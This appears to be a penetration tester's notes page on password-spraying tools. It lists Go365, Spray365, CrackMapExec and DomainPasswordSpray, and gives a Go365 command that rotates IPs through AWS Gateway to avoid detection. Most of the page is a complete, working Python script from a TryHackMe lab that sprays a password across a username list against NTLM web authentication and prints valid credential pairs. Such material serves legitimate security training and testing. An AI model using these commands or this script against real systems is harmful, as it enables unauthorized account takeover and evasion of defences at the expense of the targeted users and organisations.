SprayingToolKits
Cons: Does not have an options for IP rotate.
Go365
AWS Gateway options to IP rotate.
Set up the AWS Gateway (read )
One liner
Copy ./Go365 -endpoint rst -ul <email_file.txt> -pl <password_list.txt> -d <domain.com> -w 5 -url <aws_url> -o go365.ouputfile
Spray365
InsideTrust - Statistically Likely Usernames
Very useful wordlists with statistically likely usernames. Can be used to identifiy valid accounts usernames.
CrackMapExec
For password spraying with CrackMapExec: here .
I used this tool once to conduct a password spray attack against a web application with Net-NTLM application. It worked fairly well! However, we need to modify the line 12 in the script Ntlm.py if the web application use HTTP instead of HTTPS.
DomainPasswordSpray
To conduct a Password Spraying attack against AD from a Windows attack box.
NTLM Authentication Password Spray Script
TryHackMe custom script to conduct a password spray against NTLM authentication.
THM script - python3
Copy #!/usr/bin/python3
import requests
from requests_ntlm import HttpNtlmAuth
import sys , getopt
class NTLMSprayer :
def __init__ ( self , fqdn ):
self . HTTP_AUTH_FAILED_CODE = 401
self . HTTP_AUTH_SUCCEED_CODE = 200
self . verbose = True
self . fqdn = fqdn
def load_users ( self , userfile ):
self . users = []
lines = open (userfile, 'r' ). readlines ()
for line in lines :
self . users . append (line. replace ( "\r" , "" ). replace ( "\n" , "" ))
def password_spray ( self , password , url ):
print ( "[*] Starting passwords spray attack using the following password: " + password)
count = 0
for user in self . users :
response = requests . get (url, auth = HttpNtlmAuth (self.fqdn + "\\" + user, password))
if (response . status_code == self . HTTP_AUTH_SUCCEED_CODE) :
print ( "[+] Valid credential pair found! Username: " + user + " Password: " + password)
count += 1
continue
if (self . verbose) :
if (response . status_code == self . HTTP_AUTH_FAILED_CODE) :
print ( "[-] Failed login with Username: " + user)
print ( "[*] Password spray attack completed, " + str (count) + " valid credential pairs found" )
def main ( argv ):
userfile = ''
fqdn = ''
password = ''
attackurl = ''
try :
opts , args = getopt . getopt (argv, "hu:f:p:a:" , [ "userfile=" , "fqdn=" , "password=" , "attackurl=" ])
except getopt . GetoptError :
print ( "ntlm_passwordspray.py -u <userfile> -f <fqdn> -p <password> -a <attackurl>" )
sys . exit ( 2 )
for opt , arg in opts :
if opt == '-h' :
print ( "ntlm_passwordspray.py -u <userfile> -f <fqdn> -p <password> -a <attackurl>" )
sys . exit ()
elif opt in ( "-u" , "--userfile" ) :
userfile = str (arg)
elif opt in ( "-f" , "--fqdn" ) :
fqdn = str (arg)
elif opt in ( "-p" , "--password" ) :
password = str (arg)
elif opt in ( "-a" , "--attackurl" ) :
attackurl = str (arg)
if ( len (userfile) > 0 and len (fqdn) > 0 and len (password) > 0 and len (attackurl) > 0 ) :
#Start attack
sprayer = NTLMSprayer (fqdn)
sprayer . load_users (userfile)
sprayer . password_spray (password, attackurl)
sys . exit ()
else :
print ( "ntlm_passwordspray.py -u <userfile> -f <fqdn> -p <password> -a <attackurl>" )
sys . exit ( 2 )
if __name__ == "__main__" :
main (sys.argv[ 1 :])